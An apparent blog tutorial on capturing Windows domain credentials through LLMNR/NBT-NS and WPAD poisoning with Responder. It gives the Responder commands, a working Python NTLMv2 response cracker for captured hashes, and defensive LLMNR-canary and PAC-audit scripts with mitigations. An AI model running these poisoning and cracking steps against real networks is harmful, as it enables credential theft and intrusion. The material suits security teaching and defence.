Billions of machines, spanning every industry, run Windows. Most everyday computer users are on Windows: it takes no knowledge of terminal commands, people can click on pretty pictures, and they don't have to think about anything except the task they want to complete. Though very user friendly, it is littered with small weaknesses that have been around for quite some time. Today I'll be going into some of the ways one can escalate privileges in Windows environments, including Active Directory. If you work in any sort of offensive security role, then you should understand how to escalate privileges on Windows, because you will come across it eventually if you haven't already. For those not in cyber security, no worries! Just don't browse to random websites or watch porn at work and we'll call it good enough. Given that it has so many vulnerabilities, it is a large target for malware. Windows has the highest user count, the most critical infrastructure, and the most misconfigurations by admins. I have literally zero stats to back that up, but since over a billion machines in the world run Windows, I could definitely believe those statements (LOL).
Initially, let's talk about Active Directory (AD). Large enterprises and businesses run on AD. It's a great solution for security and permissions administration since it can handle large-scale networks that may span wide geographic areas if need be. "Active Directory uses a structured data store as the basis for a logical, hierarchical organization of directory information (Windows Internals)." So what does this mean? It means we can administer user accounts and computer accounts with Active Directory Domain Services on Windows Server. Now I'm not going to give a full class on AD, but you will need to know how a domain is structured for this to make sense. For that, dig into the Windows Internals book by Mark Russinovich and co-authors; honestly, it will open your eyes to how complex Windows can get. Every logon with a domain account (local accounts are the exception), and therefore every access to a shared folder under a domain identity, is authenticated by a domain controller; AD-integrated DNS usually lives on the DCs as well. The domain controller is the server that holds the directory (every user, computer and group object) and handles authentication for the domain. Awesome, we have a target that most attackers want to gain control of. Since the domain controller stores the credential material for the whole domain (the password hashes in NTDS.dit), if we achieve control of it we can move anywhere in the domain with access to most, if not all, information. We have a light base; now let's talk about some of the services AD environments use for tasks like file sharing and name resolution:
Kerberos - For authentication using tickets
SMB - File transfers/sharing
NFS - Network File System for distributed file systems
LLMNR - Link Local Multicast Name Resolution, quick name resolution for hosts on the same network
WPAD - Web Proxy Auto-Discovery uses DHCP or DNS to locate a proxy auto-config (PAC) file that tells the client which proxy to use for each URL (enabled by default on Windows clients through "Automatically detect settings"; hardened environments turn it off because of its long history of abuse, but you may get lucky)
NBT-NS - NetBIOS Name Service - host discovery by NetBIOS name
In this article, I'm just going to touch on LLMNR/NBT-NS poisoning. For a fuller description check out MITRE ATT&CK: https://attack.mitre.org/techniques/T1171/ (the technique has since been refiled as T1557.001, LLMNR/NBT-NS Poisoning and SMB Relay). I'll be using the tool Responder since it is built specifically for this and makes the process extremely simple. Now, to do this attack I built a mock AD domain with a whopping one user, so as you can imagine, in a real network there's a lot more traffic flying around. Responder answers every unresolved name it sees, so on a busy segment it sends out many poisoned responses, and that volume is exactly what a defender's sensors pick up. Remember, the goal on offense is to stay low and move slow.
Imagine you're a user and you need to connect to a particular file share. We'll say its name is "filepath." "Oh nice, let me just type that into the Explorer address bar and ... wait. Is the share called filepath or fileshare?"
I, the attacker, have already gained initial access to the network somehow and am patiently waiting as Responder runs with "responder -I eth0" to listen on the eth0 interface.
Noice! Responder picked up the LLMNR query for "filepath", which DNS couldn't resolve, and answered that it knew where the share was, so the host tried to open the share on our machine and sent its credentials. Alright, one step back. What is supposed to happen? The target first asks the DNS server for "filepath". The DNS server responds that no such name exists, so the target falls back to multicasting an LLMNR query (224.0.0.252, UDP 5355) and, failing that, broadcasting an NBT-NS query (UDP 137), asking if anyone on the local segment owns that name. We step in and say, "Yes, I have that good good you're looking for, send them creds BB and I'll give you the hook up." The target then says, "I certainly will!", connects to us over SMB and performs NTLM authentication. What we capture is not the password and not the stored NT hash, but the NTLMv2 challenge/response (Responder logs it as an NTLMv2-SSP hash), which can be cracked offline but, unlike the NT hash itself, cannot be replayed in a pass-the-hash attack. But Brian, what is NTLM? Well NTLM stands for New Technology LAN Manager, the successor to LAN Manager. It's a challenge-response authentication protocol specific to Windows that works in 7 steps:
1.) The user enters credentials and the client computes the NT hash of the password (MD4 over the UTF-16LE password), discarding the plaintext.
2.) The client sends the username to the server.
3.) The server generates a random 8-byte nonce (the challenge) and fires it back to the client.
4.) The client computes a response from the challenge using the NT hash (NTLMv1 uses DES; NTLMv2 uses HMAC-MD5 over the challenge plus a client-supplied blob) and returns it to the server.
5.) The server forwards the username, the challenge and the response to the DC over Netlogon.
6.) The DC uses the username to retrieve the stored NT hash (from its directory database, NTDS.dit, for domain accounts; the SAM only holds local accounts) and computes the expected response from the same challenge.
7.) Finally the DC compares the response it computed with the response it received; if they match, the password the user entered is correct.
None of this is encrypted on the wire: the username, the challenge and the response are visible to anyone on the path, and what is never sent is the password or the hash itself. The protocol holds up only as long as that challenge/response pair can't be cracked. In a modern domain Kerberos is the default, but NTLM is still supported and must be used for logon authentication on stand-alone systems. It is not a sub-protocol of Kerberos; both sit under the Negotiate (SPNEGO) package, and whenever Kerberos can't be used (a resource addressed by IP instead of a name, a non-domain-joined host, or a name the KDC has no service principal for, which is exactly the case for our made-up "filepath") Negotiate falls back to NTLM. That fallback is the reason we still see these responses flying around whenever a user reaches for a network resource. Kerberos is going to be another article for later since it's a beast of its own, pun intended. This information came straight from MSDN: https://docs.microsoft.com/en-us/windows/win32/secauthn/microsoft-ntlm. Nice, so we have a challenge/response, what now? The obvious answer is crack it. John (format netntlmv2) or Hashcat (mode 5600) are the more commonly used tools. Your hardware and wordlists will determine how much time the cracking will take.
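To make the seven steps concrete, here is an added example (my code, not Responder's or Microsoft's) that computes the NTLMv2 response the way the client does in step 4 and the DC does in step 6, then runs a dictionary attack over a Responder-style capture line. The user, domain, password, challenge and client blob are made up; the MD4 routine is inlined because hashlib's md4 is disabled in many OpenSSL 3 builds. Notice that the DC's check in step 7 and the cracker's check per candidate are the same comparison.

```python
"""NTLMv2 challenge/response: compute it like a client, crack it like Responder's users do.

Added example, not Responder's code. The capture below is constructed from a
made-up user/domain/password; nothing here was taken off a real network.
"""
import hashlib
import hmac
import struct
from typing import Iterable, Optional


def md4(data: bytes) -> bytes:
    """RFC 1320 MD4. Inlined because the NT hash is MD4(UTF-16LE(password)) and
    hashlib.new('md4') is unavailable on OpenSSL 3 builds without the legacy provider."""
    mask = 0xFFFFFFFF
    F = lambda x, y, z: (x & y) | (~x & z)
    G = lambda x, y, z: (x & y) | (x & z) | (y & z)
    H = lambda x, y, z: x ^ y ^ z
    rotl = lambda x, n: ((x << n) | (x >> (32 - n))) & mask
    msg = bytearray(data) + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64)
    msg += struct.pack("<Q", (len(data) * 8) & 0xFFFFFFFFFFFFFFFF)
    state = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    rounds = (
        (F, 0x00000000, tuple(range(16)), (3, 7, 11, 19)),
        (G, 0x5A827999, (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15), (3, 5, 9, 13)),
        (H, 0x6ED9EBA1, (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15), (3, 9, 11, 15)),
    )
    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = state
        for fn, k_add, order, shifts in rounds:
            for i, k in enumerate(order):
                a = rotl((a + fn(b, c, d) + X[k] + k_add) & mask, shifts[i % 4])
                a, b, c, d = d, a, b, c  # rotate so the next register to update is 'a'
        state = [(s + v) & mask for s, v in zip(state, (a, b, c, d))]
    return struct.pack("<4I", *state)


def nt_hash(password: str) -> bytes:
    """Step 1: the NT hash the client keeps and the DC stores (what pass-the-hash needs)."""
    return md4(password.encode("utf-16-le"))


def ntowf_v2(username: str, domain: str, password: str) -> bytes:
    """NTOWFv2 (MS-NLMP): HMAC-MD5 keyed with the NT hash over UPPER(user) + domain."""
    identity = (username.upper() + domain).encode("utf-16-le")
    return hmac.new(nt_hash(password), identity, hashlib.md5).digest()


def nt_proof_str(username: str, domain: str, password: str, server_challenge: bytes, blob: bytes) -> bytes:
    """Steps 4 and 6: the 16-byte response, HMAC-MD5 over server challenge + client blob."""
    return hmac.new(ntowf_v2(username, domain, password), server_challenge + blob, hashlib.md5).digest()


def sample_blob(client_challenge: bytes = b"\xaa" * 8, timestamp: int = 0) -> bytes:
    """A minimal NTLMv2_CLIENT_CHALLENGE (constructed; real ones carry more AV_PAIRs)."""
    av_pairs = struct.pack("<HH", 2, 6) + "LAB".encode("utf-16-le") + struct.pack("<HH", 0, 0)
    return b"\x01\x01" + b"\x00" * 6 + struct.pack("<Q", timestamp) + client_challenge + b"\x00" * 4 + av_pairs + b"\x00" * 4


def make_capture(username: str, domain: str, password: str, server_challenge: bytes, blob: bytes) -> str:
    """Render the line Responder writes: user::domain:challenge:NTProofStr:blob (hashcat 5600)."""
    proof = nt_proof_str(username, domain, password, server_challenge, blob)
    return f"{username}::{domain}:{server_challenge.hex()}:{proof.hex()}:{blob.hex()}"


def crack(capture: str, wordlist: Iterable[str]) -> Optional[str]:
    """Step 7, repeated per candidate: recompute the response and compare with the captured one."""
    username, _, rest = capture.partition("::")
    domain, challenge_hex, proof_hex, blob_hex = rest.split(":")
    challenge, proof, blob = bytes.fromhex(challenge_hex), bytes.fromhex(proof_hex), bytes.fromhex(blob_hex)
    for candidate in wordlist:
        if hmac.compare_digest(nt_proof_str(username, domain, candidate, challenge, blob), proof):
            return candidate
    return None


if __name__ == "__main__":
    # Constructed capture: user bgriffin in domain LAB with password Summer2019! (all made up).
    line = make_capture("bgriffin", "LAB", "Summer2019!", bytes.fromhex("0123456789abcdef"), sample_blob())
    print(line)
    print("cracked:", crack(line, ["123456", "Password1", "Summer2019!"]))
```

The domain string is used as captured (case preserved) while the username is upper-cased, which is why a capture line with the wrong domain case will never crack even with the right password in the wordlist.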
This was pretty quick, but I also cherry-picked the passwords for my wordlist. Typically, offensive teams have extremely "beefy" hardware for password cracking with massive wordlists, so the cracking isn't a major hurdle. To fix this, disable LLMNR with a GPO (Computer Configuration > Administrative Templates > Network > DNS Client > "Turn off multicast name resolution") and disable NetBIOS over TCP/IP on each adapter or via DHCP, because Responder poisons NBT-NS the same way. Requiring SMB signing blunts relaying of the captured authentication, and a long password policy is what actually makes the cracking step hurt.
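The poisoned exchange described above, and whether your "disable LLMNR" GPO actually took, can be checked with a canary: ask the segment for a name that cannot exist and see who answers. This is an added example, not Responder's code; the packet builder and parser are pure Python so they can be exercised offline, and the query/response bytes built in the usage are constructed to stand in for what a poisoner would send.

```python
"""LLMNR canary: query a name that does not exist and record who claims to own it.

Added example, not Responder's code. On a clean segment nobody answers for a
made-up name; a Responder-style poisoner answers with its own IP.
"""
import os
import socket
import struct
from typing import List, Tuple

LLMNR_GROUP, LLMNR_PORT = "224.0.0.252", 5355  # RFC 4795 multicast group and port


def build_query(name: str, txid: int) -> bytes:
    """LLMNR reuses the DNS message format: 12-byte header, then one A/IN question."""
    header = struct.pack(">HHHHHH", txid, 0, 1, 0, 0, 0)  # flags=0: plain query, QDCOUNT=1
    qname = b"".join(bytes([len(label)]) + label.encode() for label in name.split(".")) + b"\x00"
    return header + qname + struct.pack(">HH", 1, 1)  # QTYPE=A, QCLASS=IN


def _read_name(msg: bytes, off: int) -> Tuple[str, int]:
    """Decode a possibly compressed name; returns (name, offset just past it)."""
    labels, jumped, end = [], False, off
    while True:
        length = msg[off]
        if length & 0xC0 == 0xC0:  # compression pointer (0xC00C points back at the question)
            if not jumped:
                end = off + 2
            off, jumped = struct.unpack(">H", msg[off:off + 2])[0] & 0x3FFF, True
            continue
        off += 1
        if length == 0:
            break
        labels.append(msg[off:off + length].decode(errors="replace"))
        off += length
    return ".".join(labels), (end if jumped else off)


def parse_answers(msg: bytes, expect_txid: int) -> List[Tuple[str, str]]:
    """(name, ipv4) pairs from the answer section; [] if this is not a response to our query."""
    if len(msg) < 12:
        return []
    txid, flags, qd, an, _, _ = struct.unpack(">HHHHHH", msg[:12])
    if txid != expect_txid or not flags & 0x8000:  # wrong transaction, or QR bit not set
        return []
    off = 12
    for _ in range(qd):  # skip the echoed question(s)
        _, off = _read_name(msg, off)
        off += 4
    answers = []
    for _ in range(an):
        name, off = _read_name(msg, off)
        rtype, _rclass, _ttl, rdlen = struct.unpack(">HHIH", msg[off:off + 10])
        off += 10
        if rtype == 1 and rdlen == 4:
            answers.append((name, socket.inet_ntoa(msg[off:off + 4])))
        off += rdlen
    return answers


def probe(name: str = "srv-canary-7f3a", timeout: float = 2.0) -> List[Tuple[str, str]]:
    """Send one LLMNR query and collect every host that answers (needs a real interface)."""
    txid = int.from_bytes(os.urandom(2), "big")
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.settimeout(timeout)
    seen = []
    try:
        sock.sendto(build_query(name, txid), (LLMNR_GROUP, LLMNR_PORT))
        while True:
            data, (src, _) = sock.recvfrom(4096)
            for _name, claimed_ip in parse_answers(data, txid):
                seen.append((src, claimed_ip))  # src answered; claimed_ip is where it says the name lives
    except socket.timeout:
        pass
    finally:
        sock.close()
    return seen


if __name__ == "__main__":
    hits = probe()
    if hits:
        print("LLMNR poisoner suspected (someone owns a name that cannot exist):", hits)
    else:
        print("no LLMNR answers: fallback resolution is either disabled or unpoisoned here")
```

Run it from a workstation VLAN on a schedule; a response from any host is the alert, since no legitimate machine owns a random canary name. The same idea applies to NBT-NS on UDP 137 with the NetBIOS name encoding, which this block does not implement.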
Good job team, let's try a different approach. This time we'll attack WPAD.
Imagine you're a user and you want to browse to a website the network hasn't seen before. We'll say its name is "bing.com." "Oh nice, let me just type that into the address bar and ... wait. Why do I have to log in?"
"Hmm ok, seems legit. Just another authentication box, let me enter my user:pass in like usual." BOOM! User is de... I mean compromised.
I ran "responder -I eth0 -wF" for this. "-w" starts the rogue WPAD proxy server and "-F" forces NTLM/Basic authentication on wpad.dat file retrieval. It doesn't always cause a login prompt, but for us it did. Alright, what is WPAD and how does it work? "Applications and components that use WinHTTP to send HTTP requests should ensure that the proxy configuration is set correctly (MSDN)." Web Proxy Auto-Discovery (WPAD) finds that configuration automatically and works in 4 steps:
1.) Using DHCP (option 252) or DNS (a host named "wpad" in the client's DNS suffix, trying progressively shorter suffixes), the URL of the Proxy Auto-Config (PAC) file is discovered.
2.) The PAC file, a small JavaScript file, is downloaded from that URL and optionally cached on the client.
3.) Then, for each HTTP request, the PAC script's FindProxyForURL(url, host) function is called with the URL and host name of the request as parameters.
4.) It returns the list of proxies to use for that request, e.g. "PROXY proxy.corp:8080; DIRECT"; the special value DIRECT means connect without any proxy (typically for hosts on the local network).
This information was also retrieved from MSDN. Our poisoned WPAD proxy is created with Responder: when a client looks up the name "wpad" and DNS has no answer, Responder answers the LLMNR/NBT-NS fallback with its own address, and the client downloads a wpad.dat from us that names our machine as the proxy. From then on the client routes its HTTP requests through us, and with -F Responder demands authentication before handing over wpad.dat, so the client sends NTLM or, once the user clicks through the prompt, Basic credentials in the clear.
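As an added example (not Responder's or Microsoft's code) of steps 1 and 2, this script walks the DNS-devolution candidates a client would try for wpad.dat, fetches the first one that answers, and lists the proxy hosts the PAC can hand back, flagging any that are not on your allowlist. DHCP option 252 is the other discovery path and is left out; the sample PAC text is constructed, and the devolution stop rule is simplified (real Windows clients apply extra policy-controlled stop rules rather than just halting before the TLD).

```python
"""Which proxy would WPAD hand this client? Discovery candidates plus a PAC audit.

Added example, not Responder's code. DHCP option 252 is not covered; the
devolution stop rule here is simplified to 'never query wpad.<tld>'.
"""
import re
import socket
import urllib.request
from typing import List, Optional, Set, Tuple

# PAC return directives that name a proxy host (DIRECT names none).
PROXY_DIRECTIVE = re.compile(r"\b(?:PROXY|SOCKS[45]?|HTTPS?)\s+([A-Za-z0-9_.:\-\[\]]+)", re.I)

# Constructed sample PAC: the second proxy entry is the kind of thing a rogue wpad.dat adds.
SAMPLE_PAC = """function FindProxyForURL(url, host) {
  if (isPlainHostName(host) || dnsDomainIs(host, ".corp.example.com")) return "DIRECT";
  return "PROXY proxy01.corp.example.com:8080; PROXY 10.13.37.5:3128; DIRECT";
}"""


def wpad_candidates(client_fqdn: str) -> List[str]:
    """Step 1 (DNS path): the wpad names a devolving client tries, longest suffix first.
    Simplified stop rule: never devolve down to the TLD (no 'wpad.com')."""
    suffix = client_fqdn.lower().split(".")[1:]
    return ["wpad." + ".".join(suffix[i:]) for i in range(len(suffix) - 1)]


def extract_proxies(pac_text: str) -> Set[str]:
    """Every host:port the PAC can return; an attacker-controlled one is the rogue proxy."""
    return {m.group(1) for m in PROXY_DIRECTIVE.finditer(pac_text)}


def unexpected_proxies(pac_text: str, allowlist: Set[str]) -> Set[str]:
    """Proxies the PAC names that are not in the allowlist of known corporate proxies."""
    allowed = {a.lower() for a in allowlist}
    return {p for p in extract_proxies(pac_text) if p.lower() not in allowed}


def fetch_pac(client_fqdn: str, timeout: float = 3.0) -> Tuple[Optional[str], Optional[str]]:
    """Step 2: try each candidate like a client would; return (url, text) of the first wpad.dat served."""
    for host in wpad_candidates(client_fqdn):
        url = f"http://{host}/wpad.dat"
        try:
            with urllib.request.urlopen(url, timeout=timeout) as resp:
                return url, resp.read().decode(errors="replace")
        except OSError:  # URLError/HTTPError/timeouts all derive from OSError
            continue
    return None, None


if __name__ == "__main__":
    # Hypothetical allowlist for this lab; replace with the proxies your PAC is supposed to name.
    KNOWN_PROXIES = {"proxy01.corp.example.com:8080"}
    url, text = fetch_pac(socket.getfqdn())
    if text is None:
        print("no wpad.dat served on the DNS path; auditing the constructed sample instead")
        url, text = "sample", SAMPLE_PAC
    bad = unexpected_proxies(text, KNOWN_PROXIES)
    print(f"{url}: proxies={sorted(extract_proxies(text))} unexpected={sorted(bad)}")
```

Because the script only follows the DNS path, a clean result here does not clear a rogue PAC delivered by DHCP option 252 or by an LLMNR answer for the bare name "wpad"; run it from the same VLAN as the clients and compare against the PAC your proxy team actually publishes.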
According to Microsoft, the WPAD weakness addressed by MS16-077 affects Windows Vista through Windows 10 version 1511 on the client side and Windows Server 2008 through Windows Server 2012 R2 on the server side; the affected versions are listed in the bulletin: https://docs.microsoft.com/en-us/security-updates/securitybulletins/2016/ms16-077. To stop it, an admin can turn off automatic proxy discovery ("Automatically detect settings" under Internet Options > Connections > LAN settings, deployable by GPO) and hard-code which proxy to use, and make sure the Windows DNS server's global query block list still contains "wpad" so nobody can register that name. On top of this, that same admin should apply MS16-077 and everything released since and get off unsupported versions of Windows Server; upgrading to Windows Server 2019 is the simple way to do both.
These two attacks are at the basic-to-intermediate level of offensive security. LLMNR comes enabled by default on Windows Vista and later, hence why it can be a quick target if found running. WPAD, though older, can still be relevant because not every company has the money to upgrade. Not every company is going to have competent system administrators either. Attackers prey on these oversights.
Responder is also a great suite of tools, but as always, you should know both your target and tools very well. There really shouldn't be much guessing at all of whether or not your attack is going to work because you should have a deep understanding of the full situation. If you're guessing, you're flirting with getting compromised.
On a final note, this is looking like the start of a Windows series. Everyone cracks Windows for being "easy" because it's cool, but when it comes time to tote guns, peeps can't pull the trigger. Respect and study your opponents, right? Every network is unique. Stay fresh, homies.